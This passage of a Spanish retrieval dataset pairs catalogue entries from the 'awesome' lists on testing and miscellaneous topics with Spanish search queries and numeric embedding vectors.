-0.01072, 0.12059, -0.08631, -0.06389, -0.01868, 0.07621, -0.1244, 0.00395, -0.00282, -0.00272, 0.01381, 0.00477, -0.05583, 0.03031, -0.05505, 0.03932, 0.01983, -0.03213, -0.00303, -0.09936, -0.02385, 0.04567, 0.03205, -0.07398, 0.00579, -0.06019, -0.03975, 0.03272, -0.02545, -0.0003, -0.03858, -0.01482, 0.05933, 0.00545, 0.05559, 0.07004, -0.00816, 0.02757, -0.05844, 0.07436, -0.00782, -0.02464, 0.08723, 0.05287, -0.06776, -0.03347, -0.01566, -0.08152, -0.00673, 0.01396, 0.06899, 0.04499, -0.06401, 0.00745, -0.03716, 0.05093, 0.00421, 0.01178, 0.0908, -0.03606, -0.03552, 0.05901, 0.00976, -0.05012, -0.08279, 0.02445, 0.03737, 0.03588, 0.00171, -0.07194, 0.09079, 0.00672, 0.05581, -0.0099, 0.02188, -0.01148, 0.04633, 0.0125, 0.02099, -0.01032, 0.01701, 0.10033, -0.01009, 0.01523, -0.10825, 0.00842, 0.01451, 0.03491, 0.06457, 0.0636, 0.04067, -0.06859, -0.05791, 0.03135, -0.06847, -0.01173, -0.01494, 0.03713, 0.01754, -0.04486, 6e-05, 0.00812]} +{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "que herramienta de prueba sirve para automatizar navegadores", "v": [0.06639, -0.01667, -0.22546, -0.2696, 0.03652, -0.04859, -0.03031, -0.08157, -0.03632, -0.07931, -0.0427, -0.05463, -0.0092, -0.01169, 0.02358, 0.11247, 0.1, -0.13061, -0.01906, 0.0581, 0.07704, -0.0619, -0.04845, -0.07646, -0.06056, 0.01246, -0.04158, -0.00841, -0.19755, 0.00512, -0.12354, 0.0283, 0.08834, -0.0408, -0.07535, -0.0591, 0.02272, 0.0036, 0.0091, 0.08365, 0.05055, 0.06542, -0.07498, 0.03535, 0.00413, 0.10075, 0.0068, -0.0356, -0.03147, 0.00942, 0.02832, -0.16164, -0.11373, 0.02652, -0.03731, -0.117, 0.21691, -0.13036, 0.06765, -0.08942, -0.01327, -0.03877, -0.01696, 0.01494, -0.01572, -0.05142, 0.06511, -0.04234, -0.05779, 0.07085, -0.00533, 0.07408, 0.03534, 0.0195, -0.06459, 0.0576, 0.00267, 0.07686, 0.04457, 0.00734, 0.08564, -0.00792, -0.1056, -0.0202, -0.02599, -0.13051, 0.00496, -0.03606, 0.10761, -0.0606, 0.01116, 0.11694, 0.0612, 0.01977, 0.03308, -0.02478, 0.15879, -0.09973, 0.03844, -0.03092, 0.15718, -0.10479, -0.04931, 0.10813, -0.01684, -0.00119, 0.02387, -0.03125, -0.03668, -0.05633, 0.09876, 0.01162, -0.05685, -0.00589, 0.00274, 0.10501, 0.02229, -0.05981, -0.06013, -0.12186, 0.00236, 0.01939, -0.13247, -0.03342, -0.00592, 0.03278, 0.03708, 0.0496, -0.00416, -0.0694, 0.09228, -0.00528, -0.11736, 0.06257, -0.04031, 0.03256, 0.00409, -0.12976, -0.02972, -0.03173, 0.02654, 0.0698, -0.04647, -0.07869, 0.08337, 0.03692, 0.00902, -0.01445, -0.0423, -0.01653, 0.0009, -0.09946, -0.00321, 0.01808, -0.07717, 0.02257, -0.01165, 0.04937, -0.03969, 0.0509, -0.03628, -0.04086, 0.05308, 0.07308, 0.00016, -0.02585, -0.00065, -0.01594, 0.07708, 0.01599, 0.04422, 0.0364, 0.03465, -0.07024, 0.03042, 0.03141, -0.04335, 0.03629, -0.01276, -0.0777, 0.00809, -0.01689, -0.0447, -0.06028, -0.01158, -0.03986, 0.05446, -0.0511, 0.02103, 0.03581, -0.02291, 0.0106, -0.03436, -0.0417, 0.11088, 0.05811, -0.00277, -0.03722, 0.00934, -0.05298, -0.03651, -0.02518, -0.00292, -0.04775, 0.00984, 0.09253, 0.05444, -0.02911, 0.03684, 0.01156, 0.00449, 0.00668, 0.04563, -0.02987, 0.00736, -0.04058, 0.02722, 0.01475, -0.04368, -0.03152, -0.03121, -0.04361, -0.00367, 0.03196, -0.01978, 0.07573, 0.06971, -0.0102, -0.01082, -0.04797, 0.00711, -0.03559, -0.00468, 0.0109, 0.04073, -0.05359, 0.02774, -0.01132, -0.0325, -0.06971, -0.04674, 0.05695, 0.01894, -0.05005, -0.04091, -0.04676, -0.01029, -0.07631, -0.00673, -0.03243, -0.0653, 0.02054, 0.03651, -0.01798, 0.00503, 0.01934]} +{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "con que puedo medir el rendimiento de una aplicaciΓ³n web", "v": [0.04687, 0.10911, -0.12367, -0.19726, 0.13674, 0.07672, -0.15196, 0.05659, -0.08099, -0.02971, -0.02863, -0.02312, 0.00908, -0.11711, 0.07856, 0.06365, -0.02915, -0.11195, -0.03688, -0.01082, 0.10863, -0.00884, -0.09726, -0.07523, -0.00175, 0.18979, -0.00372, 0.0323, -0.10525, -0.1198, -0.10738, 0.05005, 0.02086, -0.06313, -0.08182, -0.07574, -0.06091, 0.08967, -0.03449, 0.0118, -0.06352, 0.01112, -0.04888, -0.03333, 0.10678, 0.04899, -0.01924, 0.01183, -0.04336, -0.08487, -0.00228, -0.08187, 0.03067, 0.01744, -0.11589, -0.02808, 0.08514, -0.04042, 0.06331, -0.10483, -0.0389, -0.02396, -0.03518, -0.01209, 0.10586, -0.06211, -0.03522, 0.06166, -0.11017, 0.0184, 0.0503, 0.08815, -0.07263, -0.04694, 0.07778, 0.10288, -0.08714, 0.03023, -0.02114, -0.08839, -0.04499, -0.03948, -0.08654, 0.04508, -0.07287, -0.08769, 0.09303, -0.11152, 0.0864, -0.02962, -0.01196, -0.00477, -0.06848, -0.00277, -0.09046, -0.07245, 0.13156, -0.00998, 0.05138, -0.00759, -0.00593, -0.02734, -0.0846, -0.0454, 0.01286, 0.09374, 0.04186, -0.03514, -0.0995, -0.04502, 0.09487, -0.11354, -0.14792, 0.07151, -0.05043, 0.0589, -0.11072, -0.04864, -0.00357, -0.10649, -0.1049, -0.01659, -0.01741, -0.06168, -0.00513, -0.02495, -0.01056, 0.06322, 0.01103, 0.00104, 0.02964, 0.01695, -0.09182, 0.03864, 0.00227, 0.0279, -0.00269, -0.04524, 0.03633, 0.0383, 0.01684, 0.00647, -0.07287, 0.03557, 0.06432, -0.08867, -0.01052, -0.00515, -0.09005, 0.02847, 0.04817, -0.06616, -0.01841, 0.0251, -0.12669, 0.00412, 0.00151, -0.04743, -0.02085, -0.00938, -0.07174, -0.00739, -0.02047, 0.03788, 0.03013, -0.01271, 0.02594, 0.00967, 0.03466, 0.07315, -0.0544, 0.02252, 0.00631, -0.1796, 0.08087, -0.01442, 0.01762, 0.00671, 0.06012, -0.02698, -0.03773, -0.01838, 0.00218, -0.02412, -0.04568, -0.02273, -0.01482, 0.01756, 0.00124, 0.04177, 0.04428, 0.08583, 0.00818, -0.01279, 0.04791, -0.0536, 0.01998, -0.05883, 0.00923, -0.03545, -0.06302, -0.06376, -0.04019, -0.02491, 0.07324, 0.10281, -0.01768, 0.10167, -0.00981, 0.05427, 0.01346, -0.01034, 0.10144, 0.0251, -0.01802, -0.00777, 0.11965, -0.01129, -0.01447, -0.01112, -0.06469, -0.0195, 0.03041, -0.00242, 0.03522, 0.05398, 0.04385, -0.01642, -0.00469, 0.01798, -0.0262, -0.0171, -0.04204, -0.03882, 0.05327, -0.02429, 0.02038, -0.05996, -0.06915, -0.0393, -0.04787, 0.05362, 0.05758, -0.00147, -0.04604, -0.02967, -0.09006, -0.02234, -0.0178, -0.12346, -0.03286, 0.0373, 0.07194, -0.02683, 0.06954, -0.0077]} +{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "cual es un programa libre para realizar pruebas visuales en la interfaz", "v": [0.10285, 0.03494, -0.23058, -0.08764, 0.1069, -0.07131, 0.01398, -0.0988, 0.04729, -0.16648, 0.11533, -0.08073, -0.08905, -0.02038, 0.08749, 0.16238, 0.13189, -0.13142, 0.01109, 0.00252, -0.00651, -0.02163, -0.09659, -0.04907, -0.07853, 0.08705, -0.03136, -0.04618, 0.03469, -0.07648, 0.01517, 0.02449, 0.1338, -0.07114, -0.00041, -0.0834, 0.02214, 0.033, 0.03829, -0.00556, 0.04279, 0.03823, -0.08613, 0.04196, 0.05865, -0.09692, -0.03051, 0.0508, -0.08206, -0.06376, 0.00307, 0.06836, -0.00282, 0.01525, 0.09568, -0.14914, 0.08738, -0.1135, -0.01276, 0.03028, 0.00316, 0.02785, 0.10662, -0.01704, 0.04666, -0.02922, 0.04089, 0.05187, -0.06477, 0.0702, 0.03137, 0.06197, 0.03388, 0.00943, -0.06279, 0.06404, -0.11852, -0.07051, 0.08316, -0.04155, 0.0832, -0.01542, -0.02505, 0.12879, -0.07069, -0.03691, 0.04687, -0.06088, -0.07027, -0.04436, 0.06635, 0.05902, 0.00387, 0.06519, 0.06161, -0.03336, 0.05061, 0.07818, 0.03749, 0.0366, 0.04195, -0.03913, -0.13572, 0.07943, -0.06665, -0.01318, 0.05761, -0.01102, -0.09134, -0.00313, 0.02849, -0.02815, -0.04078, 0.01698, -0.13422, 0.00772, 0.00189, -0.05016, 0.04899, -0.08995, -0.012, 0.00581, -0.08969, 0.01706, 0.05618, -0.03931, 0.02838, 0.1094, -0.04468, 0.13664, 0.03252, 0.04953, -0.07953, -0.07153, -0.08358, -0.03373, -0.02063, -0.08511, 0.04073, -0.03358, 0.02707, 0.0303, 0.11404, 0.03207, 0.0289, 0.04991, -0.04173, -0.06812, -0.10134, 0.06896, -0.00497, 0.02024, -0.01621, 0.09594, -0.05592, 0.00494, 0.00199, -0.02427, -0.03322, 0.05598, -0.04045, 0.02943, -0.07479, -0.01216, 0.05962, -0.02013, -0.11108, -0.01178, 0.07708, 0.02135, -0.01662, 0.00251, 0.00714, -0.0474, 0.03883, 0.04496, -0.0133, -0.09532, -0.013, -0.08668, -0.05858, 0.08009, -0.00791, -0.04635, -0.0389, -0.0523, -0.04806, 0.01194, 0.05458, -0.02332, -0.01661, 0.06235, -0.01619, -0.01592, 0.09081, 0.00188, -0.02414, -0.02375, -0.02635, -0.0641, -0.06929, -0.03627, -0.00782, -0.09738, 0.00788, 0.10018, 0.00511, 0.05008, -0.002, 0.10242, 0.00341, -0.02404, 0.08053, -0.03958, -0.05739, -0.01867, 0.05872, -0.01782, -0.00257, 0.02637, 0.0099, 0.0219, 0.02558, 0.01849, -0.02212, -0.04158, 0.05092, 0.07292, 0.00737, 0.00738, -0.04648, 0.00366, -0.00387, -0.05807, 0.0602, 0.07503, 0.00193, -0.01501, -0.00283, -0.12557, 0.0254, 0.10309, -0.0331, -0.08971, -0.02067, -0.03541, -0.10419, -0.00821, 0.02329, -0.06231, -0.05767, 0.07215, 0.07538, -0.01366, 0.02175, -0.01883]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "que programa sirve para escribir artΓ­culos cientΓ­ficos sin distracciones?", "v": [-0.15456, 0.01344, -0.05792, -0.19927, 0.08479, -0.21786, -0.11935, -0.11337, 0.07474, -0.16602, 0.04682, -0.09616, -0.05327, -0.13301, 0.06977, -0.06029, 0.16657, 0.02982, 0.11495, -0.02645, -0.01747, -0.12553, 0.02243, -0.09086, -0.0495, -0.13802, -0.04065, 0.0033, -0.06642, 0.08227, -0.03639, 0.10897, 0.08448, -0.09142, -0.00546, 0.06274, 0.02695, -0.04114, 0.00938, 0.11043, -0.05479, 0.02161, -0.04384, 0.00381, -0.00817, 0.03146, 0.02277, 0.00269, -0.07232, 0.03542, -0.04165, 0.0743, 0.0735, -0.03391, -0.01577, 0.02713, -0.04504, -0.08422, -0.04076, 0.05614, 0.00201, 0.10538, -0.02298, -0.08676, 0.00262, -0.05852, 0.07086, -0.05467, -0.11601, 0.05395, -0.02021, -0.12206, 0.08347, -0.01918, -0.02977, 0.05965, -0.1365, 0.00485, 0.07455, -0.01667, -0.09908, -0.01157, 0.04185, 0.03509, 0.06833, -0.01956, 0.07731, -0.05499, -0.09323, 0.06321, 0.01929, 0.05891, 0.06326, 0.02876, 0.06398, -0.02109, 0.20374, -0.02376, 0.08631, 0.16964, 0.05121, -0.01669, 0.0451, 0.06519, -0.0793, 0.10709, 0.04377, 0.03484, 0.00182, 0.00473, 0.00038, -0.02632, -0.02821, -0.05888, -0.04629, 0.06085, -0.06101, 0.05308, 0.00194, -0.06212, -0.06395, 0.03992, -0.03892, 0.01324, 0.12972, 0.02184, -0.00976, 0.01004, 0.05042, 0.0546, 0.03273, -0.01075, -0.00134, -0.01676, -0.04067, -0.0616, 0.07705, -0.01372, -0.04899, -0.00971, 0.10263, 0.02999, -0.07052, 0.03153, -0.01698, 0.0165, 0.05143, -0.03512, 0.00795, 0.05535, -0.03352, 0.02263, 0.02629, 0.02937, -0.03104, -0.01725, 0.04529, -0.00728, -0.09212, 0.01409, -0.06976, 0.06245, 0.04359, -0.01024, 0.0936, -0.0352, -0.05566, -0.03956, 0.01976, 0.09359, -0.10366, 0.07969, 0.02485, -0.09325, 0.01263, 0.01829, -0.02857, 0.09193, 0.01498, -0.06201, -0.07666, 0.03757, -0.04446, -0.00638, -0.00603, -0.02525, 0.03501, -0.00852, 0.0106, -0.02524, -0.04665, -0.00778, -0.03531, -0.03392, 0.01479, -0.0475, -0.01567, -0.03733, 0.12551, -0.03624, 0.01598, -0.01092, 0.00117, 0.05869, 0.00987, 0.08241, -0.03532, -0.00149, -0.03398, 0.03749, 0.04905, -0.04538, -0.02051, 0.0803, -0.07798, -0.06211, 0.01385, 0.05992, 0.00986, 0.10461, 0.07964, -0.03703, -0.00962, 0.0385, -0.0407, -0.03925, 0.06234, 0.03817, 0.00677, 0.06032, -0.00179, -0.03496, 0.02335, 0.01761, 0.00207, 0.01741, -0.03135, -0.01336, -0.00692, -0.0173, 0.01394, 0.04216, 0.02653, -0.05527, -0.00812, 0.03162, -0.0321, 0.01285, -0.02181, -0.02314, -0.02668, -0.03439, 0.03103, -0.04203, 0.09911, 0.08307]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "cual es una alternativa libre a Google Sheets o Excel para trabajar con datos?", "v": [-0.08992, -0.0237, 0.01367, -0.07951, -0.08269, -0.11893, -0.02459, -0.08613, -0.04285, 0.00278, -0.20111, -0.14616, -0.107, -0.07852, 0.10685, -0.0164, 0.07168, -0.11688, 0.01471, -0.05356, -0.0712, 0.02574, -0.10532, -0.1666, -0.03917, 0.02299, -0.10736, 0.08309, -0.02839, 0.15028, 0.02133, -0.04003, -0.14124, -0.04247, -0.00865, 0.1569, 0.0292, 0.11117, 0.01584, -0.20273, 0.05196, 0.00468, -0.19824, 0.14054, 0.04759, -0.02048, -0.02978, 0.04996, -0.06477, -0.0045, -0.08485, 0.02577, -0.09171, -0.02076, 0.07632, 0.03897, 0.11465, -0.07316, -0.05454, 0.02159, -0.03399, 0.04772, -0.01097, 0.03528, -0.01937, 0.1055, 0.07701, 0.08983, -0.00804, 0.13385, 0.0028, -0.00308, -0.06281, -0.10599, 0.00522, -0.05812, -0.00287, 0.00846, -0.10172, 0.11123, 0.01926, -0.04629, -0.0424, 0.07545, 0.00532, -0.06799, 0.03125, -0.09324, -0.03593, -0.03989, 0.03642, 0.0775, -0.04392, 0.07552, 0.06634, 0.04685, -0.00139, -0.11184, -0.05979, 0.03129, 0.10218, 0.04154, -0.12369, 0.03298, -0.01074, 0.03841, -0.02626, 0.12286, -0.17855, 0.02799, -0.0242, -0.0311, -0.00776, 0.02055, 0.08572, -0.08298, -0.0117, 0.02876, -0.05612, -0.01394, 0.03349, -0.03483, -0.05636, 0.00507, -0.0244, -0.06358, 0.06419, 0.09299, -0.00935, 0.05556, 0.02693, -0.04782, -0.05634, -0.01894, -0.00378, 0.07235, 0.02891, -0.05787, 0.01339, -0.03459, 0.04021, -0.05759, 0.01073, -0.02103, -0.01624, 0.00955, 0.03143, 0.0853, -0.0306, -0.11702, -0.07702, -0.00027, 0.04167, 0.12065, -0.09529, -0.0042, -0.06299, 0.02269, -0.02558, -0.02212, 0.0531, -0.0257, 0.00041, 0.0669, -0.00985, 0.01015, 0.05314, -0.01977, 0.02034, 0.03155, -0.04637, 0.05052, 0.11248, -0.14675, 0.07781, -0.01991, -0.04701, -0.04894, 0.05233, 0.0088, 0.01449, 0.0202, -0.02593, 0.02156, -0.01432, -0.03474, 0.04184, -0.03911, -0.03662, 0.0306, -0.1018, 0.08818, 0.03101, -0.07027, 0.05485, -0.0668, -0.01166, -0.03613, 0.00119, -0.00177, -0.05512, -0.02079, -0.02064, 0.01267, -0.0266, 0.03, 0.00641, 0.00042, 0.0247, -0.01438, 0.00111, -0.01883, 0.01309, 0.02173, -0.03272, -0.02069, 0.0629, -0.02543, 0.03763, -0.02664, -0.01885, 0.01132, 0.02546, -0.03626, -0.02225, 0.00744, 0.04345, 0.00245, -0.07735, -0.05365, 0.0667, -0.02827, -0.02695, 0.01752, 0.00973, -0.00076, -0.03462, 0.01926, 0.03909, -0.02761, 0.03566, 0.0596, -0.05837, -0.02402, -0.03422, 0.03533, -0.07822, 0.02525, -0.01855, -0.01445, -0.0412, 0.00393, -0.00492, 0.00377, -0.01198, -0.01412]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "con que herramienta puedo visualizar informaciΓ³n compleja de forma clara?", "v": [0.04618, 0.12956, -0.19002, -0.11266, 0.09466, -0.20603, -0.03412, 0.03919, -0.08647, -0.1474, 0.05226, -0.03542, 0.02845, -0.07786, 0.12471, 0.05577, 0.08094, -0.17182, -0.05069, -0.04553, 0.03702, -0.08588, -0.13552, -0.02457, -0.22561, -0.06131, -0.02616, -0.0223, -0.07907, -0.00875, -0.05899, 0.07373, 0.00332, 0.02316, -0.04675, 0.07676, -0.12677, 0.05976, -0.01929, -0.05587, -0.08162, 0.04471, 0.0627, 0.07967, 0.02724, 0.00706, -0.12187, 0.03365, -0.06892, 0.09584, -0.04064, -0.13061, -0.1685, -0.04288, -0.03082, -0.17738, 0.22196, -0.1094, 0.02465, -0.10083, 0.01874, 0.02628, -0.06621, 0.03621, -0.04821, 0.04164, 0.07123, -0.0783, -0.02238, 0.01357, -0.00712, -0.0215, -0.02121, -0.0501, -0.01402, -0.02527, 0.03862, 0.01475, 0.08558, -0.01186, 0.08055, -0.03721, -0.13878, -0.01301, -0.09122, -0.07305, 0.03099, -0.00266, 0.05055, -0.17494, -0.01234, 0.04454, 0.01957, 0.05148, 0.00475, 0.02294, 0.00983, -0.01892, -0.06289, -0.02292, 0.08266, 0.03292, -0.0514, 0.01305, -0.03, -0.01349, -0.05814, -0.04704, -0.07507, 0.01515, 0.03605, 0.05527, -0.01507, -0.01732, 0.02702, 0.03853, -0.05686, 0.01595, -0.04731, -0.05147, 0.07264, 0.05315, -0.06262, -0.02255, 0.02975, 0.0116, -0.05176, 0.06785, -0.01995, -0.07608, -0.03912, 0.00212, -0.10219, 0.05903, 0.03345, -0.02104, -0.01937, -0.12445, 0.02004, -0.07897, -0.00199, 0.01844, -0.03202, -0.09768, -0.0016, -0.05995, 0.00711, -0.07097, -0.0829, 0.0076, 0.03465, -0.05638, 0.05632, 0.01739, -0.01591, 0.0418, -0.04156, 0.03507, -0.07842, 0.03253, -0.07631, -0.00506, -0.01756, -0.01544, -0.0123, -0.0746, 0.00187, -0.01907, 0.05328, -0.00553, -0.04048, 0.00711, 0.05635, -0.02907, -0.06565, -0.05614, -0.09351, 0.01029, -0.03855, -0.05559, -0.03653, -0.00136, -0.07946, -0.03358, 0.01313, -0.07296, -0.00546, -0.0264, -0.00541, -0.00506, 0.03358, 0.08025, 0.01977, -0.05428, 0.05165, 0.02785, -0.04392, -0.03762, 0.04458, 0.006, -0.04253, -0.00847, -0.00022, -0.02797, 0.002, 0.08357, -0.02782, 0.00151, 0.02845, 0.01526, 0.06118, -0.01727, 0.03613, -0.0733, -0.01367, -0.0286, -0.03135, 0.01008, -0.04382, 0.0141, 0.01485, 0.07325, 0.06211, -0.04836, 0.04112, -0.01624, 0.04825, 0.06026, -0.01415, -0.01638, 0.00981, -0.00305, 0.0135, -0.00479, 0.0207, -0.04426, 0.02168, -0.03752, -0.07753, -0.02905, 0.01363, 0.03968, 0.03939, 0.01325, -0.06952, -0.04208, -0.02785, 0.00076, -0.04202, -0.11189, -0.03754, 0.02696, 0.09249, -0.02186, 0.01469, -0.01332]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "con quΓ© programa puedo trabajar con puntos Unicode?", "v": [-0.11216, 0.05863, -0.12958, -0.18791, -0.01705, -0.08464, -0.11109, -0.03519, -0.07829, -0.05835, -0.09755, -0.07601, -0.03785, 0.01675, -0.21212, -0.06192, 0.0766, -0.09794, 0.06795, 0.04188, 0.08432, -0.10429, -0.02934, -0.02888, -0.04071, 0.00539, -0.06454, 0.02135, 0.08396, -0.08976, 0.01387, 0.10964, 0.04114, 0.00014, -0.08432, 0.06957, 0.05747, 0.11127, 0.0293, -0.0005, 0.02757, 0.06024, -0.09637, 0.06514, 0.05292, 0.02003, 0.13767, -0.01623, 0.06, -0.12311, 0.05592, -0.03815, 0.00034, -0.09827, 0.06112, -0.01678, 0.06241, 0.05892, -0.09507, 0.07228, -0.03988, 0.12533, -0.05527, -0.11114, -0.06716, 0.1128, 0.0715, -0.03718, -0.09049, 0.06539, -0.00257, 0.09855, 0.02268, -0.15423, 0.03361, 0.111, -0.08103, -0.10372, 0.01134, -0.01743, -0.00193, -0.01755, 0.05023, 0.00542, 0.05089, -0.06181, 0.00062, -0.05025, -0.1889, -0.0636, 0.09478, 0.0572, 0.04206, -0.08066, 0.03702, -0.02528, 0.03834, -0.0181, 0.01708, -0.02813, 0.02755, -0.07799, -0.16659, 0.08073, 0.01495, 0.03478, -0.03931, 0.04807, -0.05903, 0.04111, 0.02598, -0.05965, -0.06409, -0.06472, -0.09507, -0.05982, 0.0293, 0.03349, -0.03008, -0.07479, -0.03824, 0.00168, -0.02782, 0.07505, 0.07621, -0.01019, 0.02265, 0.14042, -0.04836, 0.0796, -0.03197, -0.01579, -0.07768, -0.05272, -0.05451, 0.07803, 0.04156, -0.04475, 0.0148, 0.04767, -0.0219, 0.09575, -0.00655, 0.0846, 0.067, 0.06151, 0.01509, -0.04251, -0.09715, -0.08009, -0.04118, 0.00671, -0.00651, -0.00903, -0.09493, -0.06813, 0.04114, 0.00171, -0.10476, -0.01524, -0.00267, -0.02721, -0.05056, 0.03977, -0.06972, 0.05084, -0.03766, 0.02542, 0.10097, 0.03795, -0.04364, 0.07692, 0.10328, -0.04252, 0.01252, 0.03211, -0.04382, 0.0147, 0.03388, -0.02127, -0.07076, 0.08595, 0.06039, -0.00803, 0.03897, 0.02582, 0.04464, 0.0566, -0.04077, 0.00784, -0.0301, 0.06805, -0.00973, -0.01903, 0.01142, -0.02124, -0.02096, 0.03367, -0.02458, -0.09446, -0.01182, -0.02996, -0.0072, -0.0165, 0.04157, 0.13045, -0.05905, -0.04602, 0.01596, 0.08566, 0.02213, -0.07597, -0.01355, 0.04997, 0.00213, -0.07641, -0.02353, 0.02078, 0.04038, -0.02474, -0.01213, 0.0106, 0.00014, -0.01396, 0.00946, -0.12548, 0.01971, 0.01979, -0.01186, 0.03019, 0.05082, -0.05544, -0.04163, -0.01467, 0.00358, -0.02701, -0.03596, 0.05212, 0.00286, -0.03786, -0.01759, 0.04821, -0.02398, -0.07827, 0.00212, -0.00709, -0.03692, 0.00829, -0.00037, 0.03657, -0.03561, 0.01354, 0.03602, -0.05024, 